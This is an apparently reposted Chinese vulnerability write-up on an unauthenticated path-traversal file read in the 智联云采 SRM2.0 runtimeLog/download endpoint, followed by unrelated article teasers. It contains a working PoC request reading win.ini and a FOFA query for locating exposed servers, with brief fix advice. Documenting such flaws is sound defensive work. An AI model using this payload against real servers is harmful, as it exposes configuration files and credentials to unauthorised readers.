智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞复现

news2024/11/24 11:04:35

0x01 产品简介

智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。

0x02 漏洞概述

智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:title=="SRM 2.0"

0x04 漏洞复现

PoC

GET /adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2045993.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Python 中的 SHAP 简介

本文中有多篇计划文章,后期会补充相关链接。鉴于公众号内无法后期修改文章,请关注原文链接。 如何创建和解释 SHAP 图:瀑布图、力图、平均 SHAP 图、蜂群图和依赖图 可直接在橱窗里购买,或者到文末领取优惠后购买: SHA…

iOS替代商店AltStore PAL获得EPIC的资助 即日起取消1.5欧元的年度订阅费

知名游戏开发商 EPIC 日前宣布通过 EPIC MegaGrant 计划向 iOS 替代商店 AltStore PAL 进行捐赠,该商店是在欧盟市场经过苹果批准的合规的第三方应用商店。 按苹果规定第三方替代商店需要缴纳核心技术费并且没有豁免条款,因此该商店每被一名用户安装&am…

RIP学习笔记

1.RIP简介 Rip:routing information protocol,路由信息协议。属于动态路由协议的一种。 RIP是应用较早、使用较普遍的内部网关协议(InteriorGatewayProtocol,简称IGP),适用于小型同类网络,是典型的距离向量(distance-vector)协议…

OKR 与 KPI 的区别

OKR出现后,大家经常会拿KPI与之一起比较,结果两级分化:爱KPI的一如既往KPI,把OKR说的一无是处。爱OKR的,搞起了“去KPI”化。Tita作为OKR应用软件的服务商,我们也必须对OKR和KPI有充分的理解。对此我认真做…

Ubuntu离线安装docker

查看操作系统版本: rootzyh-VMware-Virtual-Platform:~/install# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 24.04 LTS Release: 24.04 Codename: noble rootzyh-VMware-Virtual-Platform:~/install#…

微服务架构设计中的常见的10种设计模式

微服务架构设计的概念 微服务架构(Microservices Architecture)是一种用于构建分布式系统的软件设计模式。它将大型应用程序拆分成一组小型、自治的服务,每个服务都运行在其独立的进程中,服务之间通过轻量级的通信机制&#xff08…

重塑商业生态:技术驱动下的批发供应系统开发与革新

在当今这个快速变化的商业环境中,批发供应系统作为连接生产商、分销商与零售商的关键纽带,其效率与智能化水平直接影响着整个供应链的运作效率与市场竞争力。随着信息技术的飞速发展,特别是大数据、云计算、人工智能(AI&#xff0…

D. 二进制

1.题意:给出2中操作 1):将段排序 2):将段输出为十进制数 思路: 1.考虑第一种操作。只需要查询l-r中1的个数即可。如果递增,则中为1,否则中为1,需要一个覆盖tag 2.考虑如何维护十进制的值。…

基于Java的美妆购物网站的设计与实现

TOC springboot323基于Java的美妆购物网站的设计与实现 第1章 绪论 1.1选题动因 当前的网络技术,软件技术等都具备成熟的理论基础,市场上也出现各种技术开发的软件,这些软件都被用于各个领域,包括生活和工作的领域。随着电脑和…

在 S7-1200/S7-1500 中,如何测量一个完整程序、子程序或特定组织块的运行时间?

RUNTIME"指令的第一次调用用来设置测量时间的起点,并将其保存在DB变量 "Memory"中来为第二次调用做参考。然后调用 "TestBlock" 程序块。当程序块被执行后,"RUNTIME" 指令第二次调用,第二次调用来计算 "TestBlock"程序块的运行…

电影《白蛇:浮生》观后感

上周看了电影《白蛇:浮生》,动画的特效方面,中国动画这几年确实做的非常不错了,不过整个故事,还是老的那套,并没有感觉特别新意。 (1)老套故事 《白娘子传奇》的故事,几…

NCBI批量下载序列

根据提供的accession编号批量下载 下载地址 NCBI_batch 点击选择文件,导入需要下载的accession编号文件,点击Retrieveji下载

eNSP 华为划分VLAN

SW1&#xff1a; <Huawei>system-view [Huawei]sysname SW1 [SW1]VLAN batch 10 20 //批量划分vlan [SW1]interface GigabitEthernet0/0/1 [SW1-GigabitEthernet0/0/1]port link-type access //设置为access口&#xff0c;access口允许单个vlan通过 [SW1-GigabitEth…

数据结构day02(链表)

【1】链表 Link list 链表又称单链表/链式存储结构&#xff0c;用于存储逻辑关系为“一对一”的数据 和顺序表不同&#xff0c;使用链表存储数据&#xff0c;不强制要求在内存中集中存储&#xff0c;各个元素可以分散存储在内存中。 所以在链表中&#xff0c;每个数据元素可以配…

K7系列FPGA多重启动(Multiboot)

Xilinx 家的 FPGA 支持多重启动功能&#xff08;Multiboot&#xff09;&#xff0c;即可以从多个 bin 文件中进行选择性加载&#xff0c;从而实现对系统的动态更新&#xff0c;或系统功能的动态调整。 这一过程可以通过嵌入在 bit 文件里的 IPROG 命令实现上电后的自动加载。而…

计算机网络体系结构【★★★】

&#xff08;★★&#xff09;代表非常重要的知识点&#xff0c;&#xff08;★&#xff09;代表重要的知识点。 一、计算机网络概述 1. 计算机网络的性能指标&#xff08;★★&#xff09; 1&#xff09;速率&#xff08;speed&#xff09; 指连接到计算机网络上的节点在数…

用爬虫玩转石墨文档详细操作步骤

石墨文档是一款强大的在线文档编辑和协作工具&#xff0c;它支持文字处理、表格制作、演示文稿等多种功能&#xff0c;适用于个人和团队的办公需求。以下是一些玩转石墨文档的详细步骤和技巧&#xff1a; 1. 注册和登录 注册&#xff1a;访问石墨文档官网&#xff0c;点击“注…

【漏洞复现】某骋BPM系统——Handler.ashx——sql注入

声明&#xff1a;本文档或演示材料仅供教育和教学目的使用&#xff0c;任何个人或组织使用本文档中的信息进行非法活动&#xff0c;均与本文档的作者或发布者无关。 文章目录 漏洞描述漏洞复现测试工具 漏洞描述 某骋BPM系统是一款功能全面的商业流程管理平台,旨在帮助企业实现…

车辆横向控制的参考路径估计

Reference Path Estimation for Lateral Vehicle Control 车辆横向控制的参考路径估计 Abstract Autonomous driving cars have been a hot topic in the media in recent years, with more and more tech companies and universities presenting projects with fully autom…

同态加密和SEAL库的介绍(九)CKKS 参数心得 1

写在前面&#xff1a; 前面几篇有官方的说明和示例做支撑&#xff0c;相信能给大家比较多的参考价值。但是由于没能对同态加密有更深入的了解&#xff0c;所以在我具体使用的时候出现各种问题。本篇是针对这些问题做的一些测试&#xff0c;由结论产生的了些个人的推测&#xff…